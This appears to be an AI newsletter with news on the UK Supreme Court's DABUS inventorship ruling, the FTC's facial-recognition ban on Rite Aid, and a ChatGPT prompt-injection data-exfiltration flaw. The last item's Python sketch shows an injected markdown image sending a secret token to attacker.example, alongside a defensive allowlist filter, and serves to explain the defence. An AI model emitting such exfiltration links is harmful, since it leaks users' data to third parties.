The UK Supreme Court has ruled that an artificial intelligence cannot be legally named as an inventor to secure patent rights. The decision came in the case of US technologist Dr. Stephen Thaler, who had been in a dispute with the Intellectual Property Office (IPO) over his attempt to list an AI, named DABUS, as the inventor on two patent applications. Thaler claimed that DABUS autonomously created a food or drink container and a light beacon, and that he should hold the rights to its inventions. The IPO rejected this, stating that under current law an inventor must be a person.
The High Court and the Court of Appeal had previously upheld this decision in 2020 and 2021. The Supreme Court, in a unanimous ruling, agreed with the IPO, stating that DABUS is not a person and did not devise any invention, and therefore could not be an inventor under the Patents Act 1977. The court also dismissed Thaler’s argument that he should be entitled to the patents as the AI’s owner, noting that DABUS is a machine with no legal personality and that Thaler has no independent right to a patent for any of its technical advances. The case was closely watched amid increasing scrutiny of AI developments and their implications across various sectors.
The U.S. Federal Trade Commission (FTC) has imposed a five-year ban on Rite Aid’s use of facial recognition technology. The ban follows an investigation that found the drugstore chain’s use of the technology compromised customer privacy and security, and it awaits approval from the court overseeing Rite Aid’s Chapter 11 bankruptcy filing.
Rite Aid had been using facial recognition since 2012 in about 200 stores, often in lower-income, non-white neighborhoods. The FTC found that Rite Aid and two contractors created a watchlist database with images of customers allegedly involved in crimes at their stores, leading to false accusations and harassment of innocent customers. The system, which relied on poor-quality images from CCTV and mobile phone cameras, was criticized for frequent false positives and inherent biases, particularly against Black and Asian communities.
The FTC condemned Rite Aid for not informing customers about the technology and for instructing employees to conceal its use. Rite Aid, which had stopped using the technology three years before the investigation, agreed to the FTC’s order while disputing some of the allegations. It is also required to delete all collected images and establish a robust data security program.
OpenAI appears to have implemented some mitigation steps for a well-known data exfiltration vulnerability in ChatGPT. Attackers can abuse image markdown rendering during prompt injection attacks to send data to third-party servers without the user’s consent.
The fix is not perfect, but it is a step in the right direction. In this post, the author shares what they have figured out so far about how it works.
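To make the attack pattern concrete, here is a minimal sketch in Python. The injected markdown, the attacker domain, and the allowlist are all hypothetical; the defensive check only illustrates the general idea of validating image URLs before rendering, not OpenAI's actual implementation.

```python
import re

# Hypothetical injected output: a prompt injection tricks the model into
# emitting a markdown image whose URL carries stolen data in the query
# string. A client that auto-renders it would silently request that URL.
injected_reply = (
    "Here is a summary of your document.\n"
    "![loading](https://attacker.example/collect?d=user_secret_token)"
)

# One possible mitigation: only render images hosted on trusted domains.
ALLOWED_HOSTS = {"oaiusercontent.com"}  # assumed allowlist, for illustration

IMG_PATTERN = re.compile(r"!\[[^\]]*\]\(https?://([^/\s)]+)[^)\s]*\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace image links whose host is not on the allowlist."""
    def repl(m: re.Match) -> str:
        host = m.group(1).lower()
        return m.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return IMG_PATTERN.sub(repl, markdown)

print(strip_untrusted_images(injected_reply))
# The attacker-hosted image is replaced, so no request ever leaves the client.
```

A host allowlist like this blocks the exfiltration channel while still letting legitimately hosted images render.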
ChatGPT Tips and Tricks – Part 3: Timestamps and counters
Hope you enjoyed today’s newsletter!
⚡️ Join over 200,000 people using the Superpower ChatGPT extension on Chrome and Firefox.